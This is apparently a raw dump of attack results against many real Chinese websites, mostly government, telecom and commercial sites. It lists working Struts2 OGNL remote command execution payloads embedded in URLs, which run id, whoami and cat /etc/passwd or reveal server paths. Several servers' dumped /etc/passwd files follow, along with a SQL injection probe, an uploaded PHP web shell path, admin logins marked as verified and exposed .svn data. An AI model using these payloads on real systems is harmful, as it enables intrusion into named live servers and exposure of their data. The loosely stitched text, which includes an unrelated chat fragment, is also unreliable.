http://job.bjcsair.com/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.wodingche.com/frontend/holiday/holiday-auto!list.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22id%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://219.142.70.7:7090/telecomoa/login.jsp http://www.e159.com/activity/ticketpoint!index.action http://www.sepb.gov.cn/vehicle/index.action http://www.yjrcb.cn/fckeditor/editor/fckeditor.html http://ecard.nenu.edu.cn/EcardDevelopment/index/index_index.action http://bbs.lusen.com/ http://bbs.lusen.com/data/attachment/album/201307/18/064651ri35533vmmmayjyw.jpg/1.php http://www.hoolai.com/test.jsp www.hoolai.com/sango.action http://www.hoolai.com/sango.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://poc.10086.cn/Provisioning/action/toWap.action http://dove.zol.com.cn/saas/editUserInviteLogin.action http://shop.samsung.com.cn/message/news_detail.action http://www.gstzsb.com/Index.aspx http://mis.gstzsb.com/LoginGS.aspx(验证了管理员:admin http://qp.gstzsb.com/Manager/login.aspx(验证了管理员:lip http://dt.gstzsb.com/Manager/Login.aspx(验证了管理员:admin http://pssp.ceair.com/awartlot/awartlotAction!getAwartlots.action http://mall.mama100.com/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22whoami%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.zs.gov.cn/english/features/hometown/view/index.action http://www.casad.ac.cn/document.action http://www.mmtv.com.cn/Control/EpicEdit/admin/login.aspx http://wssb.jsfda.gov.cn/zwdt/index.action http://www.shcb.org.cn/index.action http://fm.tom.com/1.jsp http://fm.tom.com/login-share/binding/bindingSuccess.action root:x:0:0:root:/root:/bin/bash sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin king:x:1000:1000:king,,,:/home/king:/bin/bash Debian-exim:x:102:104::/var/spool/exim4:/bin/false statd:x:103:65534::/var/lib/nfs:/bin/false web:x:1001:1001::/home/web:/usr/local/bash-4.1/bin/bash nagios:x:1002:1002::/home/nagios:/usr/local/bash-4.1/bin/bash http://fm.tom.com/login-share/binding/bindingSuccess.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22id%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://219.136.241.156:8089/gzct4/wsjdk/index.action http://xkpt.moc.gov.cn/default/index.action http://www.sinosig.com/preinsu_get.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]%20%20{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20%20%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%20%20%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%20%20%23matt.getWriter%28%29.close%28%29 http://www.gdmec.net/phx/bidIndex.action http://buy.yesky.com/j4nker.jsp http://95588.81666.net/index.action http://www.81666.net/cms/index.action http://www.f-young.cn/news/loadNewsForDetail.action https://passport.baidu.com/v2/api/?getapi&apiver=v3 http://www.xj96566.com/IOC/client/login!index.action http://vod.e-learning.cnpc.com.cn/app/cms/company.action https://www.soopay.net/mymoney/index.do http://down.gionee.com/gineedown/index.action http://im.ct10000.com/index!serviceSelfYW.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin imhtp:x:500:500::/home/imhtp:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash http://e159.com/index.action http://s.lakala.com/TradeDetailAction.action http://s.lakala.com/logout.action http://s.lakala.com/1.txt http://ivideo.gd.vnet.cn/index!index.action http://smezj.sme.gov.cn/index.action http://smezj.sme.gov.cn/index.action http://211.167.243.131/indexAction!login.action http://218.203.214.57:8080/ADC20/sys/Logout.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ident:x:100:101::/home/ident:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin desktop:x:80:80:desktop:/var/lib/menu/kde:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mailman:x:41:41:GNU Manager:/var/mailman:/sbin/nologin mqm:x:501:501::/home/mqm:/bin/bash mqbrkrs:x:502:502::/home/mqbrkrs:/bin/bash adc:x:503:503::/home/adc:/bin/bash xf:x:504:504::/home/xf:/bin/bash ams:x:505:505::/home/ams:/bin/bash samcheck:x:506:506::/home/samcheck:/bin/bash ssh:x:507:507::/home/ssh:/bin/bash admin:x:0:0::/home/admin:/bin/bash http://61.168.11.30:8011/AirChargeWeb/login!login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://he.189.cn/self_service/logon.action http://he.189.cn/self_service/logon.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://gfp.fast.gti.cn/system/gotoLogin.action url:http://kf.sf-express.com/css/myquery/queryWQSBill.action http://www.gdzs.si.gov.cn/main/open/view/index.action http://www.zsaudit.gov.cn/main/open/view/index.action http://i.renren.com/index.action http://love2.ourgame.com/dsself/self/Bean!gift.action http://love2.ourgame.com/dsself/1.txt http://mail.bbn.com.cn/mail/login.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin luci:x:101:104::/var/lib/luci:/sbin/nologin ricci:x:102:105:ricci user:/var/lib/ricci:/sbin/nologin support:x:600:600::/opt/support:/bin/bash aimc:x:601:600::/opt/aimc:/bin/bash ainms:x:602:600::/opt/ainms:/bin/bash oracle:x:603:600::/opt/oracle:/bin/bash aisp-act:x:604:600::/opt/aisp-act:/bin/bash aimccu:x:605:600::/opt/aimccu:/bin/bash momentum:x:606:600::/opt/momentum:/bin/bash ecspread:x:103:601::/var/log/spread:/bin/sh ecuser:x:104:602::/var/spool/ecelerity:/bin/sh msyspg:x:105:603::/var/log/msyspg:/bin/sh wangyuan:x:607:600::/opt/wangyuan:/bin/bash hanxiaofeng:x:608:600::/opt/hanxiaofeng:/bin/bash huangwei:x:609:600::/opt/huangwei:/bin/bash mafang:x:610:600::/opt/mafang:/bin/bash Admin:x:611:600::/opt/Admin:/bin/bash http://wap.jx.10086.cn/wap/wap/homePage.action http://sc2rep.replays.net http://xt.ztgame.com/activity/beatfpic/query.php?id=-1%20or%2060%20%3d%2058 http://www.gdjky.com/index.html http://www.gdjky.com/ucms/admin/index.php?o=sys::login http://www.qic.com.cn/help/joinClubView.action www.deppon.com http://dev.app.yule.sohu.com/videoStatPlatform/login.action http://www.epailive.com/bottomAction_bottom_include.do http://b2g.ceair.com/MUB2G/login/loginAction_initSession.do http://crm.263.net/webContract_addWebContract.do http://pcc.263.net/PCC/loginMail.do http://wm2gmail.263.net/mail/domainLocation/domainLocationAction_LoginDispacher.do http://wmbeta.263.net/mail/login/opt/loginAction_loginOpt.do http://wm1gmail.263.net/mail/login/opt/loginAction_loginOpt.do http://ss.263.net/SelfService/register/userRegister.action http://macom.263.net/user.action http://dns.263.net/system/login_login.action http://vboss.263.net:8081/internetBankingPay/internetBankingPay_aliPay.action http://t.zhenai.com/activity/loverTopic.do http://m.zhenai.com/index.do http://xfgd.zhenai.com/activity/activityIndex.do http://hao.tcl.com/view/product/product!info.action https://e.ccb-life.com.cn/sales/service/onlineService_goPolicyList.action http://gcjs.kaifeng.gov.cn/ http://autoscm.lifan.com/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.apache.org/server-status http://ad.msn.cn/login!welcome.action http://wapgs.189.cn/wap/index/index.action http://pai.189.cn/ipaipai/portal/index/firstPage.action http://www.4008836836.com/martActivity/loveAppointment/index.action http://wp.jiangsu.118114.cn:8080/sdm/system/loginAction!adminLogin.action http://m.yule.sohu.com/client/tvnews/view.action http://60.190.57.194/webapp/xssb/zhjfwwcx/index.action http://gs.189.cn/webShop/preety/preetyNumberList.action http://www.china-cbs.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://nj.lsaic.gov.cn:7011/i!index.action http://www.xz.189.cn/shop/combo.action http://fj.189.cn/iphone5/query_order.action http://sn.189.cn/shop/phoneArea/init.action http://www7.chinatelecom.com.cn/hr/pb/regi.do http://rs.hntelecom.net.cn/hr_external_system/viewRecruitNotice.do http://agent.sipo.gov.cn:8000/sipo/index.action http://tips.passport.pptv.com/getUsertipNum.do http://tips.passport.pptv.com/aaa.txt http://admin.qianpin.com/zxsale-sys2/portal/login.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/bash work:x:501:501::/home/work:/bin/bash rd:x:502:502::/home/rd:/bin/bash monitor:x:503:503::/home/monitor:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin chengwenhua:x:504:501::/home/chengwenhua:/bin/bash tianye:x:505:501::/home/tianye:/bin/bash qiaoweibo:x:506:501::/home/qiaoweibo:/bin/bash liran:x:507:507::/home/liran:/bin/bash https://dev.vmall.com/loginAction!login.action http://manage.youku.com/manager/editChildNews/tid/360/fid/50/pid/140/lang/en http://www.youku.com/about/en/press_release_view_140.html http://hd.jstv.com/xhsy/cont.aspx?id=235 http://mstore.wo.com.cn/activity/wjy.action http://www.dragonpass.com.cn/EN-news-index.action http://www.dragonpass.com.cn/EN-news-index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22id%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://211.103.182.67:8090/bgpc_ys/ysIndex/index.action http://maimai.12582.cn/ebs/index.action http://so.mydrivers.com/DriversClick.aspx?subclassid=101&type=classid http://www.hui12580.cn/index.action http://health.139life.com/login_login.action http://tjgl.scofcom.gov.cn/Investment/info/index.action http://wap.139nb.cn:8080/cmread/index.action http://www.sz-mtr.com/ZYKF/busi.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://jl.10155.net.cn:8086/activities_party/activity/index.action http://sfocs.sf-express.com/im-client/imclient/selfHelp.action http://bvs.haier.net/security/loginInit.action http://plc.fa.omron.com.cn/admin/login.action http://111.9.120.78/cdyx/ebusiness/web/photoweb!index.action http://219.144.196.194/index.action?key=yqrc0zzIhntOSHBkvVxfRt4XnN9N29jfiWuzmB6J774TApMvRxcGtA==&code=yqrc0zzIhntNbY+ZFyRL/xRd/cFy03pmXdSMVYddINM= http://124.133.53.182:8080/ http://124.133.53.182:8080/fckeditor/ http://124.133.53.182:8080/fckeditor/editor/plugins/bbcode/_sample/sample.html http://219.141.189.228:8081/efarm/sys/main.action;jsessionid=7AAD829DAAD21D920FB6A9A278697934.s2 http://www.gotomycloud.cn/login.action http://210.73.90.17/test/webgame/index.action http://career.oppo.com/?q=about/happydetail&id=40 http://theme.oppo.com/index.php?q=admin/main/index/index http://wo.10010sh.cn/emp/woLoginAction_login.action http://wo.10010sh.cn/emp/woLoginAction_login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.2office.cn/login.action http://10010.ruyi.com/sdltq3/front/FrontPortalAction!index.action http://10010.ruyi.com/sdltq3/front/FrontPortalAction!index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.duzhe.com/login.action http://Mr.***/,其实是我微信名字:Mr.***,而不知道为何,微信会把用户名字识别成 www.lcx.cc http://Mr.***/”的时候(该域名不存在),会被“劫持”到网络运营商的广告页面(例如电信的114导航之类的),然后,然后就没有了…… http://www.szhr.com.cn/web3new/seekjob/login!login.action http://www.caohejinghr.com/login.action http://wsbs.zjjxw.gov.cn/information/index.action http://policy.mofcom.gov.cn/export/EU-REACH/xiangmuwenjian4/index.action http://119.254.72.25:8088/ http://sswz.spb.gov.cn/index/index.action?officeId=51080100 http://online.kefu.xiaomi.com/web/icc/chat/chat?c=1&s=1 http://old.wofs.com.cn http://202.101.25.184/UPOPMSPortal/login/index.action http://www.sntele.com/index.action http://www.hwcc.gov.cn http://www.hwcc.gov.cn:7093/hwzwgk/mail/action/mail!select.action?box_id=2 http://www.haxc.lss.gov.cn/home.action http://www.bs.ecnu.edu.cn/admin/default.asp http://125.64.60.6/i!index.action http://218.1.102.107:9001/tba/xzxk_search.jsp?pro_id=XXX http://www.tba.gov.cn/tba/content/TBA/xzxk/index.html http://kczx.zju.edu.cn/yjskczx/Index.action?cid=189 http://baoguo.fupin.org.cn http://adc.hn165.com/login.action;jsessionid=6F35C6FA86A675ECDCAB8CAE8437A543 http://www.fantong.com/?s=biz&a=biz_order_success&oid=7330824&bid=393266&f=&df=&void= http://www.fantong.com/?s=biz&a=biz_order_success&bid=393266&oid=7330824 http://www.186btob.com/login.action http://www.183.sc.cn http://hyy.ah163.net/meeting/portal/base/login.action http://www.xmjj.gov.cn/xxfw/login_user.action http://www.lfnews.cn/lfnews905/login.php http://www.lfnews.cn/anli/admin/ http://www.lfweishengju.cn/lfnews905/login.php http://www.lfnews.cn/sheying/index.php?m=admin&c=index&a=login&pc_hash= http://fang.lfnews.cn/xiaoqu_show.php?xiaoqu_id=16 http://www.lfnews.cn/zhuanti/admin/news_manage.php http://cc.bj189.cn/base/permission/login/login.action http://www.yypt.net.cn http://www.yypt.net.cn/finhome/home/index.action www.chinarewards.cn/om/index.action http://sx.kdsw.cn/cms2/login.jsp http://www.4001007777.com/jtec/portal/home/portal-home!infoShow.action http://www.4001007777.com/jtec/portal/home/portal-home!infoShow.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://cms.info.cncma.org/info/ http://cms.info.cncma.org/manager/status http://my.maxthon.cn/convention.html http://my.maxthon.cn/help.html http://my.maxthon.cn/login.html http://my.maxthon.cn/recover.html http://my.maxthon.cn/register.html http://my.maxthon.cn/registerMobile.html http://my.maxthon.cn//language/.svn/entries svn://10.0.0.10/web/my.mx/testing/language svn://10.0.0.10/web http://my.maxthon.cn//public/bootstrap/css/.svn/entries svn://10.0.0.10/web/my.mx/testing/public/bootstrap/css svn://10.0.0.10/web http://db.sme.gov.cn/login.action http://gxsvr.online.cq.cn/speedUp.action http://mail.online.cq.cn/aiwmWeb/admin/login.action http://gxsvr.online.cq.cn/charge.action http://stats.chinapost.gov.cn/user_login.action http://sswz.chinapost.gov.cn/login/login!link.action http://sswz.chinapost.gov.cn/index/index.action http://sswz.chinapost.gov.cn/reg/reg!edit.action http://sswz.chinapost.gov.cn/index/froinfo!reguList.action http://www.bjpost.gov.cn/ http://www.bjpost.gov.cn/PostOfficeAction!querybyxzq.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 